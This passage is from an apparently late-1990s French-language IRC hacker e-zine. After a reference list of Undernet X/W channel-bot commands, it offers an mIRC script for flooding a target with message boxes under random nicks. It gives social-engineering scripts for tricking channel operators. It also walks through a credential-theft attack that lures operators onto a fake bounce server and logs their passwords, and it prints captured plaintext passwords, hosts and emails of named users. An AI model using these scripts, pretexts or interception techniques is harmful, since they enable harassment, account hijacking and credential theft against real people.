Ca dit a X/W de kicker qq'un sur votre channel. (pas obliger de marquer de raison non plus la!)

[TOPIC]
Typograhie :
/msg X,W topic #channel <newtopic>
Ca dit a X/W de changer le Topic du channel ( con hein !)


==[Le niveau 75]==

=[Les commandes :]=

[BAN]
Typographie :
/msg X,W ban #channel <nick|user@host> [duration in hours] [level] [reason]
Ca banis qq'un dans la liste de X/W pour une certaine heure, Le maximum c :8760 (1 year).
Vous pouvez le bannir pas son nick ou son IP. Les niveaux du ban parte de 1 a votre niveau.
Un ban se situant entre les niveau 20 - 74, font en sorte que la personne peut pas se oper,
un ban de 75+ fait en sorte qui peut pas rentrer sur le channel.
Vous devez au moins avoir le meme niveau que le ban pour l'enlever.

[UNBAN]
Typographie :
/msg X,W unban #channel <nick|user@host> 
Ca debannis qq'un de votre channel


==[Le niveau 100]==

=[Les commandes :]=

[DEOP]
Typographie :
/msg X,W deop #channel <nick1> [nick2] [nick3] .... 
Deop (avec X/W) une ou plusieurs personnes sur votre channel.

[INVITE]
Typographie :
/msg X,W invite #channel <nick> 
Demande a votre X/W bot de vous inviter sur votre channel (si le channel est Invite Only [+i])

[OP]
Typographie :
/msg X,W op #channel <nick1> [nick2] [nick3] .... 
Op (avec X/W) une ou plusieurs personnes sur votre channel.

[SUSPEND]
Typographie :
/msg X,W suspend #channel <nick|user@host> <duration> s,m,h or d 
Suspend l'access d'un des user de X/W pour une periode de temps.
s(econds) , m(inutes), h(ours) or d(ays)
Vous pouvez seulement suspendre qq'un qui a un access plus petit quele votre.

[UNSUSPEND]
Typographie :
/msg X,W unsuspend #channel <nick> 
De suspend un access suspendu (encore la faut que le gars ait un acces plus petit que le votre.


==[Le niveau 400]==

=[Les commandes :]=

[ADDUSER]
Typographie :
/msg X,W adduser #channel <nick> [user@host] <level> [password]
Ajoute une personne a la liste des personnes sur X/W dans votre channel.
Vous puvez juste ajouter des personnes a un niveau inferieur au votre.
(Si vous ajouter qq'un sur X/W pis qui est surle channel, vous ete pas oubliger
de rentrer le [user@host] (IP) X/W vas le faire lui meme.

[CLEARMODE]
Typographie :
/msg X,W clearmode #channel
Enleve toute les modes (specification) du channel.
Bin pratique quand ya un takover pis quele gars a barrer ton channel
avec d'la merde.
Ex:
Ya mit +i ou +k sans que tu le sache.

[MODINFO]
Typographie :
/msg X,W modinfo #channel <variable> <user> <newvalue>
Permet de modifier les access des users inferieur a vous.

Les variables sont:

     Access : Permet de changer l'access d'une personne de 1 a -1 de votre level
     Si ta un level de 400 le max que tu vas pouvoir donner c 399.
    
     AutoOp : Met le AUTO-OP a ON ou OFF. Le AUTO-OP met une personne OP 
     automatiquement quand y rentre sue le channel (apres etre autentifier c sur!)

     Match : Permet de changer le [user@host] de qq'un dans la liste de X/W.
     Utile quand qq'un a changer de IP pis en a besoin d' un autre.
     Ex :
     /msg X modinfo #channel MATCH user blah@blah

     Password : Permet de changer le PW de qq'un.
     Ex :
     /msg x@channels.undernet.org modinfo #channel password User <New PW>
     OU
     /msg w@channels2.undernet.org modinfo #channel password User <New PW>

[REMUSER]
Typographie :
/msg X,W remuser #channel <nick>
Remove une personne de la liste de X/W.
Faut t'aille un access plus grand que celui que t'enleve.

[STATUS]
Typographie :
/msg X,W status #channel
Affiche les modes present dans le channel (+i,+k 34435,+s)
Pis le nombre de personne qui a, plus plein d'autres infos pseudo intressantes.


==[Le niveau 450]==

=[Les commandes :]=

[ADDCHAN]
Typographie :
/msg X,W addchan #channel 
Ajoute votre channel dans la liste de X/W 
Sens ca y reviendra pas automatique quand X/W vont fucker!

[JOIN]
Typographie :
/msg X,W join #channel
Ordonne a X/W de venir sur le channel

[PART]
Typographie :
/msg X,W part #channel
Ordonne a X/W de partir du channel

[REMCHAN]
Typographie :
/msg X,W remchan #channel
Enleve les Defauts setter sur le channel. (Un Gros pitton RESET)
P.S. X/W vas pas revenir apres ca sauf si vous metter la commande ADDCHAN


==[Le niveau 500]==

=[Les commandes :]=

Pour les rare a ce rendre la (ou a piquer un level 500)
voici les commandes :

[SET]
Typographie :
/msg X,W set #channel <variable> <value> 
Change les modes du channel.
NOTE : les variables AlwaysOp, UserFlags, MassDeopPro, NickFloodPro, URL et Description 
peuvent etre changer par qq'un d'un niveau 450 et plus.

Variables pour la commande SET

     MassDeopPro : Le maximum de deop que X/W vas lesser passer dans une perion de 15sec.
     Chaque personnes qui vas depasser ca vas etre Deoper pis Suspendu (si ye dans la liste)

     NickFloodPro : Le maximum de fois que qq'un vas changer de nick dans un laps de 15 sec.
     Chaque personnes qui vas depasser ca vas etre Kicker pis Suspendu (si ye dans la liste)

     FloodPro : Le maximum de Kick, TOPIC CHANGES pis des affaires dememe qui peuvent etre 
     envoyer au Channel dans un laps de 15 sec.
     Chaque personnes qui vas depasser ca vas etre Kicker pis Suspendu (si ye dans la liste)  
     
     UserFlags : Set les modes par defaut des nouveaux users
     La valeur par defaut est 0. 
          0 = AUTOOP OFF pour les new users
          1 = AUTOOP ON pour les new users

     NoOp : Avec ca X/W vas deoper TOUSLEMONDE. (X/W est le SEUL OP)
     Mais les users on quand meme access a X/W (kick/deop/ban...)

     AlwaysOp : Avec ca, X/W vas toujours etre op. Y vont se OPer tu seul si y sont pas op.

     OpOnly : Make op the only chanop command available though X/W. Also, you can ONLY op
     yourself. NOTE : This does NOT prevent someone withops in the channel from exercising op
     commands themselves.

     StrictOp :Avec ca ya juste les personnes dans la liste de X/W qui peuvent etre op.
     (apres etre identifier c sur!) 

     Lang : Change le langage par defaut de X/W. (ca marche pas a moitie)
          en (english) 
          nl (dutch) 
          fr (francais) 
          ge (deutsch)

     Description : Set le Topic par defaut dans le channel. Ca l'affecte pas le topic actuel, le
     topic peut etre vu par un chaninfo, ou sur le web.

     URL : Atache une page web (personel) a X/W (dans le topic) peut etre
     vu par un chaninfo, ou sur le web.

     AutoTopic : Ca fait que X/W reset le topic pis le URL a chaque 30 min.
     

-=[THE END .. only for that!]=-


-- -- - -[ Humm Amédé, ta pas des exemples concrets ? ]- ---- - -- --

		           Step Three

Apres ce bref apecu des commandes de X/W va faloir vous rentrer dans tete
des les utiliser comme du monde!

								wr- (Qwzykx)



<|DaEmoN| say> Le truc du four micro-onde, sa donne mal a la tete!

=[08]=========================================================
                  Annoying with crap stuff               ***--
==============================================================

Comment faire chier qq'un que vous aimer pas, pas en le nukant
ou en lui volant des access,  mais en lui pitchant de de marde
(cochonnerie). Le principe vas etre des plus simples. . . tres
tres simple , on vas lui envoyer un paquet de messages. Et oui
on vas  lui shooter des tites msg box tous  ce qui  a de  plus
simple.  Le gros principe now,  si vous sender un ti message a
qq'un  ca vas  y faire  une tite  box qui  aurra  pas le choix
d'accepter,  mais si vous changer de nick pis que vous ecriver
encore a cette meme personne , ca vas y faire une 2e msg box .
pis si vous continuer encore et encore ce move la bein koudonc
ca vas quans meme bein faire un bo ti paket de shit.Comme vous
etes pas des big workers, on vas faire un script qui vas faire
ca a notre place ( je vous comprend, c'est vrai quand-meme que
c'est dur de trouver un nom en random ) donc, voici un exenple
de commande :

-------CUT HERE----------------------------------------------

/annoy {
  /timer 0 20 /chnick
  /timer 0 10 /msg $$1 -----Annoying----- Close this shit
  /timer 0 5 /notice $$1 ---Annoying-----------------------------------------------------------[igafucker1-0] 
}
/chnick //nick $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+$rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z)

-----EOF------------------------------------------------------
A mettre dans vos ALIASES

Vous voyez quand  Stand-Alone , vous pouvez faire de la merde
mais plus vous ajourer des clones...

Enjoy of it.. pis vous pouvez modifier en masse...

								-wr (qwzykx)




<|DaEMoN|> IGa c'est de la marde, cpour les newbies, dans #UHA on vous montre comment faire un 
           un modem-cable avec un grille-pain!


=[09]=========================================================
                  Social engenering part 1              ***--
==============================================================

Bien sur  l'art du  parfais take  est de se  faire passer pour 
quelqu'un d'autre,la part social est donc primordiale. Si vous 
voulez pas avoir l'air d'un twit dans le style: Op moi je suis 
un  IRCop ou plus  con que ca : op moi ou je te nuke. L'art du 
social engenering c'est le cerveau... Un exemple facile : Vous
etes sur un chan et vous nuker un op,vous le spoofer et entrer
dans le chan . Première chose a regarder  est le  nombre de op
en haut. Si il y en a plusieurs juste a faire un mass msg dans
le style "Reop moi , si je pogne l'ostie de nukeur ..."  Yen a  
surement un qui va tomber dans le panneau !Si y'en a moins la, 
la vigilance commence..  la première  étape est la meme  qu'en
groupe ( reop moi jai été ... ) mais si le doute s'installe et
que le op vous demande par exemple: "Si  tu es le vrai tu sais
surement" (dans c'est style la) NE JAMAIS LAISSER UNE QUESTION
SANS RÉPONSE OU NE JAMAIS RÉPONDRE N'IMPORTE KOI .  Comment on
fait?  C'est simple juste a refaire le meme  tour a  quelqu'un
d'autre. Par exemple, si il vous a demander : "c koi le nom de
ta blonde si t le vrai" Vous n'avez qua aller voir un autre op
et lui demander : " Je suis pas sur que t le bon,  si t le bon 
c'est koi le nom de ma blonde.. VOILA vous avec votre  réponse
et vous n'avez pas semer de doute. C'est des petit truc simple
mais pratique ne faite pas votre amateur, faites le bien ou ne
le faite pas. Dernier  truc si c'est un chan avec  X/W  et que
vous voulez vous faire opper demander le op en disant que  X/W
lag. Je pourrais continuer des pages et des pages de cette art
mais c'est juste le 2ieme issue !! 

En passant on a déja fait une trentaine de  take sur  le  meme
chan en une semaine alors imaginer le  power de  notre  social
engenering!

Dans le prochain issue:COMMENT METTRE LES IRCOPS DE VOTRE BORD
AVEC LE SOCIAL ENGENERING.

 ----->Pour la premiere fois a l'ecran (|JaCKeL|) clap!clap!!



<DaEmOn Said> Nouveau Site UHA , Y run sur notre nouveau server plugger sur T3
              UniX PowerFull Server at ---> http://www.mygale.org/uha
		  le titre du site sapelle: "Error 404" a allez voir au plus vite!



=[10]=========================================================
           Choissisez l'elu (OP a se faire hacker)       ***--
==============================================================

Nous vous promettons une facon de hiijacker les W / X Dans cet
issue, mais avant vous devez choisir votre    Victime ,  voici 
la methode  usuel pour denicher  la victime ayant un potentiel 
maximale!

X/W sont des Bots  tous ce qui a de plus MACHINE,  dans  leurs
infos on trouve de tout.. meme un ami. Premierement une  bonne
action  concisterait a  aller sur  le site de  Cservice pis de 
checker les commandes qu'on peut sender a X/W, mais comme vous
etes  tellement  inpatient  on  vas devoir  vous la donnner la
dite commande : /msg W access #CHANNEL *
Avec s'te commande de gros hacker la vous allez avoir la liste
de tous les users  qui ont un access sur le bot (X/W) il est a
noter que la limite  de users que  vous afficher X/W est de 15
access (user) mais une autre big shot  de Cservice : les users
autentifier ( NOW ) sont dans le TOP de la liste , genre si le
Op s'est logger sur X/W y vas apparaitre dans les 5-6 premiers
users (c'est rare les channels ou ya 15 ops  de logger en meme
temps j'avoue). Donc apres avoir  fait une commande like that, 
vous dreviriez recevoir de quoi genre :

-W- USER: Bonzai (*!*@*) ACCESS: 401 LPU
-W- CHANNEL: #trippeux -- AUTOOP: OFF
-W- USER: Wario (*!*@*) ACCESS: 499 LPU
-W- CHANNEL: #trippeux -- AUTOOP: OFF
-W- USER: Misss (*!*@*.ivic.qc.ca) ACCESS: 200 P
-W- CHANNEL: #trippeux -- AUTOOP: OFF
-W- USER: {Rocket} (*!*Armor150@*.mmtl.videotron.net) ACCESS: 500 P
-W- CHANNEL: #trippeux -- AUTOOP: OFF
-W- USER: X-Files (*!*@*) ACCESS: 350 P
-W- CHANNEL: #trippeux -- AUTOOP: OFF
-W- USER: K-marx (*!*@*) ACCESS: 450 P
-W- CHANNEL: #trippeux -- AUTOOP: OFF
-W- LAST SEEN: 4 days, 14:49:37 ago

Le maximum  level c'est  500 ( pis la ta le plein control, sur
le channel mais si  vous  etes deja  a la hauteur d'un bo Take
avec X/W, vous le saviez deja, sinon bein vas te pratiquer pis
laisse la chances au VRAI de faire de la belle job. Dans cette
liste la on peut voir que les personnes ONLINE(autentifier sur
X/W) ont  un  ti  commentaire : LPU apres leur Acces , si vous
avez le "Snake Eye's" vous aurez remarquer que le 500 est  pas
sur le channel en se moment, donc on vas  piquer  un level 499
question d'avoir le pouvoir at less, piquer un acount over 400
pour que ca  veille la peine pis le level acceptable pour bien
piquer uu acoount  c'est  450 ( on peut jouer encore plus avec
X/W) Si vous avez juste des levels en bas de 400 attender,mais
si vos access sont sur #montreal ou #quebec  allez  y pareil !
L'avantage avec un level 400 c'est qu'on peut adder  des  user
sur le USERLIST de  X / W  et  meme en remouver , avec une 450 
parcontre on peut en plus faire partir X/W et le faire revenir
quand vous voulez. Donc  vous vila fixer sur  l'ELU et en gros
ce qui  faut  retenir : les user LPU sont ONLINE ) ce sont les
acounts des OPS qui sont logguer) donc ceux a qui vous pourrer
faire le X / W  Hiijaking  (l8er)  et il vous  suffira de vous
rappeler que plus le level est haut plus c'est safe pour vous.

					---------wr(Qwzykx)   


<DaEmOn Said> Im am such a bad girl, and my friends and I want
	        to get naughty with you! slurb...


=[11]=========================================================
           W/X Hiijaking (TUNNEL!)                      ****-
==============================================================


Enfin voila venu le temps de devoiler une facon simple et tres
devastatrice pour Hiijacker un W/X, c'est a dire, s' accaparer
l'account sans en etre autoriser (olala des hackers), le  truc
devoilé et mis-a-jour ici meme!


Needed things:

     - Un ordinateur, un modem et surtout une connection 
       Internet / IRC :-)
     - Un Effigie du Bonhomme Carnaval '86
     - Savoir comment ouvrir un fichier executable
     - Connaitre tout les positions possibles de 
       la souris
     - Bien faire la job, Ne pas etre un ti-newbie qui 
       vient de comprendre comment changer son ident!:]


La Methode also called la cro$$e:

Creer un tunnel (Un Redirected IP) ayant a  un  ambout:
VOUS et a lautre par exemple: Us.undernet.org port 6667
Organisez-vous pour que l'OPERATEUR Cible se   connecte
a Vous (votre IP) et du meme coup, se retrouver sur  le
Us.undernet.org port 6667. Tu Filtres se qui s'echange.

C'est la methode, maintenant en terme plus ordinaire.

Vous devez avoir   un programme qui va vous transformer
en serveur [IRC]    (En fake biensur) et qu'a    chaque
fois qu'il y aura un operateur qui se branchera a vous,
votre ordinateur lui montrera US.UNDERNET.ORG ou   tout 
autre Serveur IRC (Undernet). Apres vous n'avez    plus 
qu'a spyer se qui se dit sur votre FAKE SERVER,   genre
Recevoir des petits : 

PRIVMSG W@CHANNELS2.UNDERNET.ORG LOGIN #QUEBEC bonjour

"bonjour" etant le mot-de-passe :}

Mais! Vous allez me dire, le programme ca va etre  long 
a gosser... OKAY Tas de limaces, le programme    existe 
deja, mais n'a pas ete concu pour cela :-) 

Kline Killer 2.0 est downloadable sur notre site WEB

---------------------------------------------
Voici un exemple a l'aide de Kline killer 2.0

Premierement ouvrir Kline Killer 2.0, vous avez   trois
options {Listen Port /  Bounce Server  /  Bounce Port }
-
Listen Port: Votre port par ou on se connecte 
             Conseillé(6660-6669)

Bounce Server: La cible de redirection ( Serveur  IRC )
               Comme : Vancouver.bc.ca.undernet.org

Bounce Port: Le Port du serveur irc (6660-66669)

Et apres vous l'initialisez, de ce  fait  meme ,  vous
voila devenu un  Faux  Serveur IRC, si quelqu ' un  se 
connecte  a votre   IP  par  votre  port  (listen)  se 
retrouvera sur le Bounce Server:Bounce Port! Simple...
Fallait y penser voila tout. Dans le Programme    Vous 
Avez une boite a cocher [Loggin], Logger tout se   qui
passe, apres l'EXPLOIT** Retourner voir le Log File et
Scrutez le, Vous pouvez aussi spyer avec l'option SPY!
{Le Spy est en real-time! Donc plus pratique...}

Le Serveur Est operationnel, maintenant comment amener
Un OP A y allez? Voici quelques variantes (SOC.ENGIN):

<Hiijacker> Oui bonjour monsieur le op, votre  channel 
            roule bien se soir...(BLABLABLA...Lichage)

<Moron_Op> Oui ca roule pas trop pire ,  Tiens  je  te
           OP, ta lair sincere!


----CUTHERE--- Oubliez ca, Trop Moron! Retry ...

<Hiijacker> Oui bonjour monsieur le op, votre  channel 
            roule bien se soir...(BLABLABLA...Lichage)

***You have been kicked by (Smart_Op) (Lichage...)
Cant Rejoin the Channel (Your Banned)

---CUTHERE---- Trop Intelligent...


<Hiijacker> Oui bonjour monsieur le op, votre  channel 
            roule bien se soir...(BLABLABLA...Lichage)

<Normal_OP> Oui ca va bien....

<Hiijacker> Tant mieux, c'est se que je recherche, je 
            me presente: Yohn Baloney de IRC Security
            Survey Consortium Assosiation et je  suis 
            en train de verifier le serveur (  nommer
            le serveur de votre BOUNCE) nous y  avont 
            porter    des  ameliorations  du  coté du
	    serveur,Undernet apprecierais bien    que
            vous  nous aidiez a le tester,    cela ne
            prendra pas plus de 10 mins   {BLABLABLA}

<Normal_OP> Hummm...Ok cest quoi le serveur?

<Hiijacker> Tapez /Server VOTREIP:lelistenport
                  (ex:/Server 1.2.3.4:6661)

<Normal_OP> k

*Normal_OP as quit IRC

---------------CUTHERE--------------------------------
Apres  il  va  se reconnecter sur votre KLINE Il et va
rejoindre le channel. AVec de  la chance   il  devrait 
y avoir meme un script qui va l'auto-authentifier :-))
sur plusieurs channels,  (On apelle ca un REHASH    en 
marketing, multiplier ses gains). Si cela n'est pas le
cas, vous devrez lui demander de faire des tests like:

Pinger moi, Faite un WHOIS et quelques autre things,
pour finalement lui dire, Okay le dernier test, Op toi
et Kick moi, voir si le W/X se synchronise bien   avec
le serveur. {C'est Poussé ca mais ca marche toujours!}

Si tout fonctionne vous devriez etre en mesure de voir
en spy ou dans les logs, des bo PRIVMSG a W et   ainsi 
avoir les passcodes...

Mais avoir un passcode n'est pas toujours une benefice
car faut savoir s'en servir intelligemment, voici  les
regles a adopter pour un resultat optimum:


        - Donner vous un Nick et un USERINFO qui a de
          l'allure.

        - Spoofez-vous sur IRC pour pas que l'OP vous
          dise que le serveur c'est vous.

        - Ne jamais entrer sur un access W/X tout-de-
          suite apres.


===============DISCLAIMER to ALL======================
Ce Truc la, nous ne voulions pas   le  dire  pour  une 
bonne raison, l'information distribuer,nous ne pouvons
plus l'arreter, si tout le monde chit avec, et que les
OPS catchent l'astuce ben vous brulez du terrain comme
on dit en MARKETING :} Et ca fait en sorte que   cette
opportunité s'evanouis et deviendra des plus vetustes!
======================================================

Voici des LogFiles Typiques d'un Op Typique:
---------------------------------------------------------
Session Start: Sun Jul 26 18:16:44 1998
<Avenger> Scuse .. tu peux peut etre m'aider
<ShOtDreaM> koi ya
<Avenger> okay .. moi je me part un server qui est 
  connecter sur Undernet pis j'aurais besoin que qq'un 
  vienne dessus .. c pas vraiment compliquer.. tous ce 
  qui a a faire ce pluger dessus pis checker le lag.. 
<Avenger> ca devrais etre de 3 a 4 fois plus vite
<ShOtDreaM> euh ouais jpeut ben voir sa..
<Avenger> je demande aux op parce que c eux qui 
  d'habitude on les plus grosse connaissence ladedent !
<ShOtDreaM> okay..
<ShOtDreaM> mais tu as une t3 ??
<Avenger> ca sera pas long
<ShOtDreaM> pour se connecter su undernet...
<Avenger> pour le moment on a une t1 mais ca devrais 
  arriver dans pas grand temps
<ShOtDreaM> ok cool..
<Avenger> kin le server c'est ca : /server 207.171.170.30
   6677
<Avenger> : /server 207.171.170.30 6677
<ShOtDreaM> okay
<Avenger> sur le port 6677
<Avenger> tu peux meme tester les commandes de X/W 
  y devrais marcher
<Avenger> on est rendu dans la derniere phase la !
<ShOtDreaM> en
<ShOtDreaM> sa connecte sur baltimore???
<Avenger> ouais pour le monent
<Avenger> on vas se rajouter a montreal.qc.ca...
<ShOtDreaM> ok...
<ShOtDreaM> ben si vous avez besoin d'ircop...
<Avenger> okay c beau 1
<ShOtDreaM> jai d'lexperience la dedans:)
<Avenger> humm les commande de X/w marche ?
<ShOtDreaM> attend
<ShOtDreaM> sa lair de marcher
<ShOtDreaM> mais 
<ShOtDreaM>  /whois info for: K_C[BRB] 
<ShOtDreaM> Address Serv@ppp2547.qc.bellglobal.com
<ShOtDreaM> ya juste sa comme troub que je catch oi 
<ShOtDreaM> po
<Avenger> ouais c que t logger sur moi pour le moment 
  .. car le serv est pas actif
<Avenger> m,ais c normal
<ShOtDreaM> ok..
<Avenger> ca doit etre meme acause de t'sa que que les 
  access X/W marche pas
<Avenger> ok c beau j'ai fini ..
<ShOtDreaM> ouais c a cause de sa...
<Avenger> merci bein la
<ShOtDreaM> euh
<ShOtDreaM> ma te laisser mon e-mail...
<ShOtDreaM> shoto@kwf.ml.org
<Avenger> ma devoir deconnecter pour arranger une commande
<Avenger> plau
<Avenger> okay
<Avenger> c beau on te recall au pire
<ShOtDreaM> ok c nice...
<ShOtDreaM> alp
<Avenger> si ya de quoi ma revenir de voir ! hhe
<Avenger> t bein cool bye
<ShOtDreaM> okay:)
<ShOtDreaM> bye
Session Close: Sun Jul 26 18:26:21 1998
----------------Cut HERE-----------------------------------
Ceci est le plus con des exemples a realiser, ShotDream est
biensur le op :-) #ADOS etait le channel convoité mais  par
hasard, Notre KLINE KILLER 2.0 nous a reveler qu'il   avait 
plusieurs W/X ACCOUNT Ailleur : #MONTREAL en autre :-))))))

Voici a quoi cela a ressembler en LOG DE K-LINE!:

Checker les commantaires (******)
-------------------------------------------------------------------------------------------------
NICK ShOtDreaM

CLIENT-> USER cobain "jbruneau.cgocable.ca" "206.172.179.30" :Kurt Cobain The Only God

SERVER-> :Baltimore.MD.US.Undernet.Org 433 * Avanger :Nickname is already in use.
:Baltimore.MD.US.Undernet.
CLIENT-> NICK :K_C[BRB]

SERVER-> Org 433 * ShOtDreaM :Nickname is already in use.

SERVER-> PING :1746697639

CLIENT-> PONG :1746697639


***** IL EST CONNECTé SUR LE FAKE IRC SERVER (Votre ordi en loccurencE) *******

SERVER-> :Baltimore.MD.US.Undernet.Org 001 K_C[BRB] :Welcome to the Internet Relay Network K_C[BRB]
:Baltimore.MD.US.Undernet.Org 002 K_C[BRB] :Your host is Baltimore.MD.US.Undernet.Org, running version u2.10.04.resolv8
:Baltimore.MD.US.Undernet.Org 003 K_C[BRB] :This server was created Fri Jul 24 1998 at 07:51:09 EDT
:Baltimore.MD.US.Undernet.Org 004 K_C[BRB] Baltimore.MD.US.Undernet.Org u2.10.04.resolv8 dioswkg biklmnopstv
:Baltimore.MD.US.Undernet.Org 251 K_C[BRB] :There are 11933 users and 14170 invisible on 42 servers
:Baltimore.MD.US.Undernet.Org 252 K_C[BRB] 53 :operator(s) online
:Baltimore.MD.US.Undernet.Org 253 K_C[BRB] 5 :unknown connection(s)
:Baltimore.MD.US.Undernet.Org 254 K_C[BRB] 14160 :channels formed
:Baltimore.MD.US.Undernet.Org 255 K_C[BRB] :I have 874 clients and 1 servers
:Baltimore.MD.US.Undernet.Org NOTICE K_C[BRB] :Highest connection count: 1140 (1139 clients)
:Baltimore.MD.US.Undernet.Org 375 K_C[BRB] :- Baltimore.MD.US.Undernet.Org Message of the Day - 
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :- 25/5/1998 6:16

SERVER-> :Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :- 
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :- ===>>  Welcome to the ABSnet Undernet Internet Relay Chat Server (IRC)  <<===
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :- 
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-      ** PLEASE READ THIS, IT IS YOUR FIRST AND LAST WARNING! **
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-    * No flood/collide/clone bots of any kind will be tolerated.
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-      Even attempts to run them on this server will result in you
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-      being banned. Bots I receive complaints about also will be
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-      terminated. Multiple  connections  and  fake userids are
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-      prohibited.
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-    * No Mass Messaging or Mass Notices will be tolerated.  This is
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-      a KILLable offense on Undernet, so please be courteous.
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :- 
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-    * Behave - this means instead of doing back to those that did
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-      to you, /ignore them.
:Balti
SERVER-> more.MD.US.Undernet.Org 372 K_C[BRB] :-  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-    * The policy stated here is  *THE*  policy. Please remember
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-      that, We don't have the time to discuss it with everyone!
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-    * Enjoy! IRC is supposed to be an enjoyable experience for all.
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-    * Always Remember you are a guest on our system, so please use
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-      a little discretion and be considerate while using this service.
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :- 
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-    * If you have a problem or concern, or are not sure if what you
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-      want to do is permissible, then please send us Email and ask
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-      first.  Our Email address is:  irc@abs.net
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :- 
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  This server will accept connects on ports 6660 through 6669.  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  If you are having any trouble with connections or lag on 6667 I 
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  sugge
SERVER-> st you try a different port.
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  We will also accept connections on port 1024 for AOL users.
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  Also we are NOT!! taking any applications for IRCop's, so don't ask!
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  If you have any other questions or problems, stop by our support
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  channel #ABSnet and speak with one of the IRCop's...
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-  Your IRCop's on this server are:
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-   
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-   CyberDude   [Server Admin]
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-   Lema        [Server OP]
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-   Leland      [Server OP]
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-   Phoenix     [Server OP]
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :-   ChalkFarM   [Server OP] 
:Baltimore.MD.US.Undernet.Org 372 K_C[BRB] :- 
:Baltimore.MD.US.Undernet.Org 376 K_C[BRB] :End of /MOTD command.

CLIENT-> MODE K_C[BRB] +i

CLIENT-> ISON chaton} Fuhgawz {secrete} }MaZoU{
USERHOST K_C[BRB]
MODE K_C[BRB] +i+s+w
join #mauricie
join #ici
join #trois-rivieres
join #stp
join #west-island
join #uqtr

********* REGARDER CE QUI SEN VIENT!!!!! MIAM *************

PRIVMSG x@channels.undernet.org :pass #montreal cobain
PRIVMSG x@channels.undernet.org :pass #mauricie cobain
PRIVMSG w@channels2.undernet.org :pass #ados 49io7k2
PRIVMSG time2kill :;ident 49io7k2
PRIVMSG #trois-rivieres :.up
PRIVMSG w@channels2.undernet.org :pass #trois-rivieres 49io7k2
PRIVMSG w@channels2.undernet.org :op #trois-rivieres K_C[BRB]
PRIVMSG w@channels2.undernet.org :pass #uqtr 49io7k2
PRIVMSG ariel :login cobain
PRIVMSG #stp :Ariel DO ME A geat BLOW job! :))) XxX
PRIVMSG x@channels.undernet.org :pass #west-island cobain

******** REGARDER CE QUI EST AU DESSUS , GOTCHA!!! TOUT LES  PASS
         DE W/X MEME DES EGGDROPS Sur QUELQUE CHANS!!! AVOUEZ QUE
         VOUS COMMENCEZ A SENTIR LE POUVOIR COULER DANS VOS VEINES,
         UNE GRACIEUSETé DE iGA BIENSUR ****************************************

SERVER-> :K_C[BRB] MODE K_C[BRB] :+i
:Baltimore.MD.US.Undernet.Org 303 K_C[BRB] :
:Baltimore.MD.US.Undernet.Org 302 K_C[BRB] :K_C[BRB]=+Serv@ppp20543.qc.bellglobal.com
:K_C[BRB] MODE K_C[BRB] :+ws
:K_C[BRB]!Serv@ppp20543.qc.bellglobal.com JOIN :#mauricie
:Baltimore.MD.US.Undernet.Org 332 K_C[BRB] #mauricie :Si tu pouvais me sentir maintenant..Ton coeur serait défait ..Si tu pouvais me toucher une fois ..Je sais que l'amour te ramènerait ..)
:Baltimore.MD.US.Undernet.Org 333 K_C[BRB] #mauricie ChAn-BoT 901486165
:Baltimore.MD.US.Undernet.Org 353 K_C[BRB] @ #mauricie :K_C[BRB] @RiCKiLLeR +daemon__ @Daemon @Giligans @Twaddle @ChAn-BoT @BlOoDrOcK 
:Baltimore.MD.US.Undernet.Org 366 K_C[BRB] #mauricie :End of /NAMES list.

CLIENT-> MODE #mauricie

SERVER-> :K_C[BRB]!Serv@ppp20543.qc.bellglobal.com JOIN :#ici
